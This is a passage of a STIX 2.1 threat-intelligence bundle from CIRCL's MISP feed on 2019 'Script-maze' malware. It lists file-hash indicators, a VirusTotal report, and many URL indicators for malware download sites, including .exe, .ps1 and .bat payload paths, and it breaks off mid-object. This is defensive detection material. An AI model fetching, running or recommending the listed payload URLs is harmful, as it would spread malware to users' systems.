misp-circl-feed/feeds/circl/stix-2.1/5cea4d65-d448-4e7c-af4a-4fe3950d210f.json

1593 lines
70 KiB
JSON
Raw Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5cea4d65-d448-4e7c-af4a-4fe3950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:37:38.000Z",
"modified": "2019-05-26T08:37:38.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5cea4d65-d448-4e7c-af4a-4fe3950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:37:38.000Z",
"modified": "2019-05-26T08:37:38.000Z",
"name": "Script-maze historical malware seen",
"published": "2019-05-26T08:37:57Z",
"object_refs": [
"indicator--5cea4d6d-f9e0-4c71-ab29-2a8d950d210f",
"indicator--5cea4d6d-1624-4a75-bfb1-2a8d950d210f",
"indicator--5cea4d6d-28f8-454f-9c29-2a8d950d210f",
"indicator--5cea4d6d-4dc4-4313-94f7-2a8d950d210f",
"indicator--5cea4d6d-2750-40d2-be58-2a8d950d210f",
"indicator--5cea4d6d-3444-4e63-b177-2a8d950d210f",
"indicator--5cea4d6d-8490-4f28-8174-2a8d950d210f",
"indicator--5cea4d6d-5fd0-44b4-9fe2-2a8d950d210f",
"indicator--5cea4d6d-5410-4c49-ab62-2a8d950d210f",
"indicator--5cea4e47-d544-4169-8690-47b5950d210f",
"indicator--5cea4fae-4d38-4905-acc7-438e950d210f",
"indicator--5cea4fd6-bbc8-4e1d-85d3-4391950d210f",
"indicator--5cea4fd6-13b8-4e59-b16c-4d59950d210f",
"indicator--5cea4fd6-4038-44f6-997e-45ec950d210f",
"indicator--5cea4fd6-9f64-4154-9ea8-4b50950d210f",
"indicator--5cea4fd6-5828-4649-91d3-492e950d210f",
"indicator--5cea4fd6-a7fc-49a8-80cb-4948950d210f",
"indicator--5cea4fd6-af8c-402c-be36-426a950d210f",
"indicator--5cea4fd6-2738-414a-9d19-43cf950d210f",
"indicator--5cea4fd6-9a74-4407-927f-4df9950d210f",
"indicator--5cea4fd6-cff8-4e3b-a350-42a9950d210f",
"indicator--5cea4fd6-4bcc-45be-a51a-404a950d210f",
"indicator--5cea4fd6-24d8-45be-8a89-4940950d210f",
"indicator--5cea4fd6-83a0-4e47-a433-4b92950d210f",
"indicator--5cea4fd6-f990-4ded-887d-497e950d210f",
"observed-data--5cea4fd6-3614-4936-adaa-470f950d210f",
"url--5cea4fd6-3614-4936-adaa-470f950d210f",
"indicator--5cea4fd6-9268-41e9-ab92-49f9950d210f",
"indicator--5cea4fd6-4488-40f1-8920-4e1a950d210f",
"indicator--5cea4fd6-a3d8-4c30-86d5-4959950d210f",
"indicator--5cea4fd6-d2f8-46ec-9c24-4b42950d210f",
"indicator--5cea5026-2614-4801-98d5-41c8950d210f",
"indicator--380c7782-2dd4-443a-9108-bf700a7d0b43",
"x-misp-object--7e77557c-59e5-421e-9ac1-7d8d4d7dc322",
"indicator--94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2",
"x-misp-object--550f6b80-a32c-41d9-93c4-db9c41528a0b",
"indicator--b58ad199-5bc6-4892-b6ea-1758b79ea763",
"x-misp-object--57dc22c7-3d93-437a-9930-7312a8472014",
"indicator--b2749b84-7bae-418b-b58a-278ee29eefea",
"x-misp-object--bf3c1c50-d629-446c-a802-a541481256f3",
"indicator--7eab9890-1152-4540-b14c-b1713dd74db7",
"x-misp-object--4a5526a0-66ef-4a36-859c-9fae1cf3a73e",
"indicator--5f4ce8ec-cff2-422d-977a-34ef4867b8f6",
"x-misp-object--ab17e198-674e-4648-8c02-f3c1fcb73d3f",
"indicator--7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c",
"x-misp-object--e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7",
"indicator--94b76905-bc8e-4167-9633-b19262f34af8",
"x-misp-object--5c2ed803-b879-4d3c-9d36-583c1fde2562",
"indicator--3751d8a9-13b3-4049-82ec-9607df7fc404",
"x-misp-object--ecfc06ea-0951-451d-8b9a-4aeae8c7f133",
"malware--5cea4e05-04c4-4f5f-ba43-4d3f950d210f",
"indicator--5cea4e93-8834-4dd5-992d-4763950d210f",
"indicator--195d072c-cab6-4370-b8ea-cf509e00959b",
"x-misp-object--e0949b09-cf58-44f5-9455-d6253e56a131",
2023-05-19 09:05:37 +00:00
"relationship--6eb30338-6dc9-477b-8de2-67c2ed6c814a",
"relationship--cf2fddd3-83bf-46e9-b475-35007bd258cc",
"relationship--65989f15-22ab-401b-ba4a-21aeee25e7cc",
"relationship--14d5fa60-cda6-4160-828e-29e5198dc170",
"relationship--0da85027-872e-447b-8495-bc8a75a1f2b4",
"relationship--77081070-a3a2-4ba6-8459-33b48d00afd4",
"relationship--18ce4b1b-1f08-4264-828c-11a1550e504d",
"relationship--ceee9fc7-5f89-4357-96ec-0afeb2451e35",
"relationship--d891033f-fbd3-407d-9af1-3fb4a52c1d50",
"relationship--84e212cd-36ce-4cee-a788-132af9eac833"
2023-04-21 14:44:17 +00:00
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"osint:certainty=\"50\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-f9e0-4c71-ab29-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = 'ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-1624-4a75-bfb1-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = '6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-28f8-454f-9c29-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = 'fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-4dc4-4313-94f7-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = '968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-2750-40d2-be58-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = '58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-3444-4e63-b177-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = '2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-8490-4f28-8174-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = '65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-5fd0-44b4-9fe2-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = '84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4d6d-5410-4c49-ab62-2a8d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:17.000Z",
"modified": "2019-05-26T08:25:17.000Z",
"pattern": "[file:hashes.SHA256 = 'b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4e47-d544-4169-8690-47b5950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:28:55.000Z",
"modified": "2019-05-26T08:28:55.000Z",
"pattern": "[url:value = 'http://74.222.1.38:8888/close.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:28:55Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fae-4d38-4905-acc7-438e950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:34:54.000Z",
"modified": "2019-05-26T08:34:54.000Z",
"pattern": "[file:hashes.MD5 = '4d437b5614edcc7d1ee5e4bcf5785ef9']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:34:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-bbc8-4e1d-85d3-4391950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://wmi.1217bye.host/2.txt']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-13b8-4e59-b16c-4d59950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://173.247.239.186/ok.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-4038-44f6-997e-45ec950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://173.247.239.186/upsupx.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-9f64-4154-9ea8-4b50950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://173.247.239.186/u.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-5828-4649-91d3-492e950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://45.58.135.106/xpdown.dat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-a7fc-49a8-80cb-4948950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://45.58.135.106/ok/down.html']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-af8c-402c-be36-426a950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://45.58.135.106/ok/64.html']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-2738-414a-9d19-43cf950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://223.25.247.240/ok/ups.html']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-9a74-4407-927f-4df9950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://45.58.135.106/ok/vers.html']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-cff8-4e3b-a350-42a9950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://45.58.135.106/kill.txt']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-4bcc-45be-a51a-404a950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://wmi.1217bye.host/S.ps1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-24d8-45be-8a89-4940950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://173.208.139.170/s.txt']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-83a0-4e47-a433-4b92950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://35.182.171.137/l.txt']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-f990-4ded-887d-497e950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://74.222.1.38/up.txt']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5cea4fd6-3614-4936-adaa-470f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:36:05.000Z",
"modified": "2019-05-26T08:36:05.000Z",
"first_observed": "2019-05-26T08:36:05Z",
"last_observed": "2019-05-26T08:36:05Z",
"number_observed": 1,
"object_refs": [
"url--5cea4fd6-3614-4936-adaa-470f950d210f"
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5cea4fd6-3614-4936-adaa-470f950d210f",
"value": "http://2019.ip138.com/ic.asp"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-9268-41e9-ab92-49f9950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://45.58.135.106/downs.txt']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-4488-40f1-8920-4e1a950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://185.112.156.92/downs.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-a3d8-4c30-86d5-4959950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://66.117.6.174/ups.rar']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4fd6-d2f8-46ec-9c24-4b42950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:34.000Z",
"modified": "2019-05-26T08:35:34.000Z",
"description": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
"pattern": "[url:value = 'http://198.148.90.34/b.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea5026-2614-4801-98d5-41c8950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:36:54.000Z",
"modified": "2019-05-26T08:36:54.000Z",
"pattern": "[url:value = 'http://down.0814ok.info:8888/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:36:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--380c7782-2dd4-443a-9108-bf700a7d0b43",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:50.000Z",
"modified": "2019-05-26T08:25:50.000Z",
"pattern": "[file:hashes.MD5 = 'b0b34b3a52b31e001b0582a70cad2aa2' AND file:hashes.SHA1 = 'de1318abdb0f202181c360d933ea543b2b8c85dd' AND file:hashes.SHA256 = 'ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--7e77557c-59e5-421e-9ac1-7d8d4d7dc322",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:50.000Z",
"modified": "2019-05-26T08:25:50.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-23T00:40:50",
"category": "Other",
"uuid": "6bb41516-4b77-4319-9bd1-2ecc84212902"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9/analysis/1558572050/",
"category": "Payload delivery",
"uuid": "e1a0aedc-fef3-47ac-96bf-1346a0917178"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "1/57",
"category": "Payload delivery",
"uuid": "81466fe0-9b85-43b0-8734-8abf874f6430"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
